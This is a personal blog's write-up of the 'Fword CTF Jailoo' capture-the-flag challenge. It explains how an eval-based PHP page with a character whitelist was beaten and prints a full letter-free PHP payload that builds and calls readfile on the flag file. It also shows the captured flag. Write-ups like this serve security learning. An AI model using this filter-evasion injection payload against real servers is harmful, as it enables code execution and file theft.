<!DOCTYPE html>
<html lang="en">

  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <meta name="author" content="Gopika Subramanian">
    <meta name="description" content="Gopika Subramanian&#39;s personal website">
    <meta name="keywords" content="blog,developer,personal">

    <meta property="og:site_name" content="Gopika Subramanian">
    <meta property="og:title" content="Gopika Subramanian">
    <meta property="og:description" content="Gopika Subramanian&#39;s personal website">
    <meta property="og:type" content="website">
    <meta property="og:url" content="https://m0n574.github.io/404.html">
    <meta property="og:image" content="https://m0n574.github.ioimages/tn.png">
    <meta name="twitter:card" content="summary">
    <meta name="twitter:site" content="https://m0n574.github.io/404.html">
    <meta name="twitter:image" content="https://m0n574.github.ioimages/tn.png">

    <base href="https://m0n574.github.io/404.html">
    <title>Gopika Subramanian</title>

    <link rel="canonical" href="https://m0n574.github.io/404.html">
    
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.2.0/css/all.css" integrity="sha384-hWVjflwFxL6sNzntih27bfxkr27PmbbK/iSvJ+a4+0owXq79v+lsFkW54bOGbiDQ" crossorigin="anonymous">
    
    <link  rel="stylesheet" href="https://fonts.googleapis.com/css?family=Fira+Mono:400,700">
    <link rel="stylesheet" href="https://m0n574.github.io/css/normalize.min.css">
    <link rel="stylesheet" href="https://m0n574.github.io/css/style.min.css">

    

    

    <link rel="icon" type="image/png" href="https://m0n574.github.io/images/favicon-32x32.png" sizes="32x32">
    <link rel="icon" type="image/png" href="https://m0n574.github.io/images/favicon-16x16.png" sizes="16x16">

    
      <link rel="alternate" href="https://m0n574.github.io/index.xml" type="application/rss+xml" title="Gopika Subramanian">
      <link href="https://m0n574.github.io/index.xml" rel="feed" type="application/rss+xml" title="Gopika Subramanian" />
    

    <meta name="generator" content="Hugo 0.68.3" />
  </head>

  <body class="">
    <main class="wrapper">
      <nav class="navigation">
  <section class="container">
    <a class="navigation-title" href="/">Gopika Subramanian</a>
    <input type="checkbox" id="menu-control"/>
    <label class="menu-mobile  float-right " for="menu-control">
      <span class="btn-mobile  float-right ">&#9776;</span>
      <ul class="navigation-list">
        
          
            <li class="navigation-item  align-center ">
              <a class="navigation-link" href="https://m0n574.github.io/posts">Blog</a>
            </li>
          
            <li class="navigation-item  align-center ">
              <a class="navigation-link" href="https://m0n574.github.io/about">About</a>
            </li>
           <li class="navigation-item  align-center ">
              <a class="navigation-link" href="https://m0n574.github.io/Gopika_CV.pdf">CV</a>
            </li>
          
        
        
      </ul>
    </label>
  </section>
</nav>


      <div class="content">
        
  <section class="container centered">
  <div class="error">
    <h1 id="fword-ctf-jailoo">Fword CTF Jailoo</h1>
<p><strong>tl;dr</strong></p>
<ul>
<li>Input executed with eval</li>
<li>Regex and blacklist restricts alphanumericals</li>
<li>Php webshell with <code>$(])_[=;+&quot;.</code> chars gives flag</li>
</ul>
<h2 id="challenge-description">Challenge description</h2>
<p>Get the flag in FLAG.PHP.</p>
<h2 id="initial-analysis">Initial analysis</h2>
<p><img src="/posts/files/fwordctf_jailoo/one.png" alt="one" /><br> <code>if(preg_match_all('/^(\$|\(|\)|\_|\[|\]|\=|\;|\+|\&quot;|\.)*$/', $cmd, $matches)){ </p><p>    echo &quot;&lt;div class=\&quot;success\&quot;&gt;Command executed !&lt;/div&gt;&quot;;     eval($cmd);</code></p><p>The challenge page takes an input, after analysising the source code, we find the following: The input is executed with </p><p><code>eval</code> function. The regex accepts only <code>$(])_[=;+&quot;.</code> characters. </p><p>There was a similar challenge in a previous CTF making Php webshell without numbers and letters. Reference: https://www.programmersought.com/article/7881105401/ </p><p>So the cooking of the webshell begins, although few obvious functions like file_get_contents where blacklisted -_- </p><p>One that worked was <code>readfile('FLAG.PHP');</code> The command for the 20 letter string being </p><p><code>$_=[];$_=&quot;$_&quot;;$_=$_[&quot;.&quot;+&quot;.&quot;];$___=&quot;&quot;;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;</p><p>$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;</p><p>$__++;$__++;$__++;$___.=$__;$__=$_;$___.=$__;$__=$_;$__++;$__++;$__++;$___.=$__;</p><p>$__=$_;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;</p><p>$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;</p><p>$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$_____=&quot;&quot;;</p><p>$__=$_;$__++;$__++;$__++;$__++;$__++;$_____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;</p><p>$__++;$__++;$__++;$_____.=$__;$__=$_;$_____.=$__;$__=$_;$__++;$__++;$__++;$__++;</p><p>$__++;$__++;$_____.=$__;$_____.=&quot;.&quot;;$__=$_;$__++;$__++;$__++;$__++;</p><p>$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$_____.=$__;$__=$_;$__++;$__++;$__++;$__++;</p><p>$__++;$__++;$__++;$_____.=$__;$__=$_;$__++;$__++;$__++;$__++;</p><p>$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$_____.=$__;$___($_____);</code></p>
<p>Giving the above string gave us the flag <code>$flag=&quot;FwordCTF{Fr0m_3very_m0unta1ns1d3_l3t_fr33d0m_r1ng_MLK}&quot;;</code></p>
<h2 id="flag">Flag</h2>
<p><strong>FLAG</strong>: <code>$flag=&quot;FwordCTF{Fr0m_3very_m0unta1ns1d3_l3t_fr33d0m_r1ng_MLK}&quot;;</code></p>
<p>For further queries, please DM me on Twitter: <a href="https://twitter.com/m0n574">https://twitter.com/m0n574</a>.</p>

  </div>
</section>


      </div>
<br><br><br><h3 align="center"><a href="https://m0n574.github.io/posts/">OTHER POSTS</a></h3>
      
        <footer class="footer">
  <section class="container">
    
      <div class="sns-shares sp-sns-shares">
        
        <a class="sns-share twitter-share" href="https://twitter.com/intent/tweet?original_referer=https%3a%2f%2fm0n574.github.io%2f&ref_src=twsrc%5Etfw&text=Yusuke%20Ishimi Yusuke%20Ishimi&tw_p=tweetbutton&url=https%3a%2f%2fm0n574.github.io%2f"><i class="fab fa-twitter"></i></a>
        
        
          <a class="fb btn sns-share fb-share" href="http://www.facebook.com/share.php?u=https%3a%2f%2fm0n574.github.io%2f" onclick="window.open(this.href, 'FBwindow', 'width=650, height=450, menubar=no, toolbar=no, scrollbars=yes'); return false;"><i class="fab fa-facebook-f"></i></a>
        
        
          <a class="sns-share linkedIn-share" href="https://www.linkedin.com/sharing/share-offsite/?url=https%3a%2f%2fm0n574.github.io%2f"><i class="fab fa-linkedin"></i></a>       
        
      
        
      </div>
    
    
      

  </section>
</footer>
<div class="content">
  <section class="container centered">
    
     
   
    
      <div class="sns-shares pc-sns-shares">
        
        <ul class="social-list">
      
        <li class="social-item">
          <a href="https://github.com/m0n574/" aria-label="Github" >
            
              <i class="fab fa-github" aria-hidden="true"></i>
            
          </a>
        </li>
      
        <li class="social-item">
          <a href="https://twitter.com/m0n574/" aria-label="Twitter" >
            
              <i class="fab fa-twitter" aria-hidden="true"></i>
            
          </a>
        </li>
      
        <li class="social-item">
          <a href="https://www.linkedin.com/in/gopika-subramanian-007304b5/" aria-label="LinkedIn" >
            
              <i class="fab fa-linkedin" aria-hidden="true"></i>
            
          </a>
        </li>
      
        <li class="social-item">
          <a href="https://gitlab.com/M0n574" aria-label="Gitlab" >
            
              <i class="fab fa-gitlab" aria-hidden="true"></i>
            
          </a>
        </li>
       
      
    </ul>  
        
         
        </div>
        
      </div>
    
  </section>
</div>

      
    </main>

    

  <script src="https://m0n574.github.io/js/app.js"></script>
  
  <script>
  (function($) {
    $(function() {
      $('#privateTrigger').on('click', function() {
        $('.private').slideToggle();
        $('#privateTriggerText').text("Thank You! Please share it if you like it→");
      });
    });
   })(jQuery);
  </script>
  
  </body>
</html>
